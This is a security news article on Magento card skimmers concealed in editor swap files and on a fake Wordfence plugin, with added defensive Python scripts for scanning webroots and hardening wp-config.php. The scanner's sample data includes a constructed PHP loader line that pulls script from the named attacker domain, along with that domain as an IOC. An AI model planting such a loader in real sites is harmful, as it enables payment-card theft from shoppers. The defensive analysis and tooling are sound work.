24 Jul

Hackers target Magento websites

Attackers have been observed using editor swap files on compromised websites to conceal credit card skimmers and harvest payment data. Sucuri identified the technique on the checkout page of a Magento e-commerce site, where the malware survived multiple cleanup attempts.

The skimmer captures data from the credit card form and exfiltrates details to an attacker-controlled domain, “amazon-analytic[.]com,” registered in February 2024. Security researcher Matt Morrow noted that using popular brand names in domain names is a common tactic by bad actors to evade detection.

The threat actor employs several defense evasion methods, including a swap file ("bootstrap.php-swapme") that carries the malicious code while the original file ("bootstrap.php") is left intact, so a scan that inspects only the canonical file sees nothing wrong. Text editors such as Vim write a swap file while a file is open for editing over SSH; if the session is not closed cleanly the swap file stays on disk, and a cleanup that restores only bootstrap.php leaves the malicious copy behind to be reintroduced. Although it is unclear how initial access was gained, SSH or another terminal session is suspected.
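Checking a webroot for this kind of leftover, as an added example that is not part of the original article or of Sucuri's tooling: the Python script below walks a directory, flags files whose names look like editor swap or backup artefacts, and reports which of them contain PHP code or a listed indicator (here the skimmer domain named in the article). The sample webroot, the contents of the "-swapme" loader and the suffix list are constructed for the demo; the heuristics are assumptions, not the steps Sucuri followed.

```python
import os
import re

# Name patterns that editors and hurried operators leave next to the real
# file. Nothing a web server serves needs any of these inside the webroot.
# ".swp"/".swo" are Vim swap files; "-swapme" is the suffix reported on the
# Magento site; the rest are common backup leftovers. Assumed list: extend it.
ARTIFACT_SUFFIXES = (".swp", ".swo", "-swapme", "~", ".bak", ".orig", ".save")

PHP_TAG = re.compile(rb"<\?(php|=)")   # PHP open tag inside a non-.php file
MAX_READ = 4 * 1024 * 1024             # editor artefacts are small; cap reads anyway


def is_artifact_name(name):
    """True for names that look like an editor swap file or a backup copy."""
    return name.endswith(ARTIFACT_SUFFIXES)


def scan_webroot(root, iocs=()):
    """Walk `root` and return a sorted list of (relative_path, reasons).

    Every artefact-named file is reported, because even a harmless-looking
    swap file can leak secrets (a half-edited .env, for instance). `reasons`
    is empty for a plain leftover and otherwise lists "php-code" and/or
    "ioc:<string>" for each IOC substring found (case-insensitive).
    """
    ioc_bytes = [i.lower().encode() for i in iocs]
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_artifact_name(name):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_READ)
            except OSError:
                hits.append((rel, ["unreadable"]))  # still worth a manual look
                continue
            reasons = []
            if PHP_TAG.search(data):
                reasons.append("php-code")
            lowered = data.lower()
            reasons += ["ioc:" + ioc.decode() for ioc in ioc_bytes if ioc in lowered]
            hits.append((rel, reasons))
    return sorted(hits)


def build_sample_tree(root):
    """Write a constructed sample webroot (not real site data) under `root`."""
    samples = {
        "app/bootstrap.php": b"<?php\n// clean bootstrap, as deployed\n",
        # constructed stand-in for an injected loader; the domain is the one
        # named in the article, defanged there as amazon-analytic[.]com
        "app/bootstrap.php-swapme": (
            b"<?php\n$u = 'https://amazon-analytic.com/j.js';\n"
            b"echo \"<script src='$u'></script>\";\n"
        ),
        # Vim-style swap file from a config edit: no PHP, but it leaks a secret
        "app/.env.swp": b"b0VIM 9.0\x00DB_PASSWORD=s3cret\n",
        "pub/index.php": b"<?php require __DIR__ . '/../app/bootstrap.php';\n",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return sorted(samples)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for rel, reasons in scan_webroot(root, iocs=["amazon-analytic.com"]):
            print(rel, reasons or ["leftover-artefact"])
```

Run it against a real webroot with `scan_webroot("/var/www/html", iocs=[...])`. Vim swap files store text in blocks rather than as one contiguous stream, so a short token such as `<?php` or a domain is normally found intact, but a long string may straddle a block boundary; treat the name match as the primary finding and the content flags as supporting evidence. Files that should never exist in the webroot at all are the point, whether or not they carry a payload.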

Meanwhile, compromised administrator accounts on WordPress sites are being used to install a malicious plugin that mimics the legitimate Wordfence plugin. The plugin can create rogue admin users and disable Wordfence while making it appear to still be running. Security researcher Ben Martin highlighted that the malicious code only activates on WordPress admin pages whose URL contains "Wordfence".


Site owners are advised to restrict FTP, SFTP and SSH access to trusted IP addresses, keep the content management system and its plugins up to date, enable two-factor authentication (2FA), use a firewall to block bots, and add wp-config.php hardening such as DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS.
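For the wp-config.php measures, as an added example that is neither from the article nor from WordPress itself: a small Python audit that reports whether DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS are defined and true, and produces a hardened copy, flipping false to true and adding missing defines above the wp-settings.php require, since constants must be defined before WordPress loads. The sample config is constructed; the regex only handles plain define() calls with a literal true or false, which is an assumption about how the file is written.

```python
import re

# The two constants the advisory recommends and what each one switches off.
HARDENING = {
    "DISALLOW_FILE_EDIT": "disables the theme/plugin file editor in wp-admin",
    "DISALLOW_FILE_MODS": "disables plugin/theme install, update and delete from wp-admin",
}

# Assumption: defines are written as define('NAME', true|false); (any quotes,
# any case for the keyword and the boolean). Constant names are case-sensitive
# in PHP, so they are compared exactly.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](?P<name>\w+)['"]\s*,\s*(?P<value>true|false)\s*\)\s*;""",
    re.IGNORECASE,
)
SETTINGS_RE = re.compile(
    r"""^\s*require_once\s+ABSPATH\s*\.\s*['"]wp-settings\.php['"]\s*;""",
    re.MULTILINE,
)


def audit_wp_config(text):
    """Return {constant: 'true' | 'false' | 'missing'} for each hardening constant."""
    seen = {m.group("name"): m.group("value").lower() for m in DEFINE_RE.finditer(text)}
    return {c: seen.get(c, "missing") for c in HARDENING}


def harden_wp_config(text):
    """Return a copy of the wp-config.php text with both constants set to true.

    Existing `false` defines are flipped in place; missing ones are inserted
    directly above the wp-settings.php require (or appended if that line is
    absent). Running it on an already hardened file changes nothing.
    """
    def flip(m):
        if m.group("name") in HARDENING:
            return f"define('{m.group('name')}', true);"
        return m.group(0)

    text = DEFINE_RE.sub(flip, text)
    missing = [c for c, v in audit_wp_config(text).items() if v == "missing"]
    if missing:
        block = "".join(f"define('{c}', true); // {HARDENING[c]}\n" for c in missing)
        m = SETTINGS_RE.search(text)
        if m:
            text = text[:m.start()] + block + text[m.start():]
        else:
            text = text.rstrip("\n") + "\n" + block
    return text


# Constructed sample: the weak setting (editor explicitly allowed, file mods
# unset) as it might appear in a site's wp-config.php.
WEAK_CONFIG = (
    "<?php\n"
    "define('DB_NAME', 'wp');\n"
    "define('DISALLOW_FILE_EDIT', false);\n"
    "/* That's all, stop editing! Happy publishing. */\n"
    "require_once ABSPATH . 'wp-settings.php';\n"
)

if __name__ == "__main__":
    print("before:", audit_wp_config(WEAK_CONFIG))
    hardened = harden_wp_config(WEAK_CONFIG)
    print("after: ", audit_wp_config(hardened))
    print(hardened)
```

DISALLOW_FILE_MODS also blocks plugin and theme updates from the dashboard, so a site that sets it needs another update path (WP-CLI or a deployment pipeline) to keep following the "stay up to date" advice. Both constants only close the wp-admin route, which is the one the fake-Wordfence campaign used through compromised admin accounts; they do nothing against an attacker who already has SSH or SFTP, which is why the IP restriction and 2FA recommendations sit alongside them.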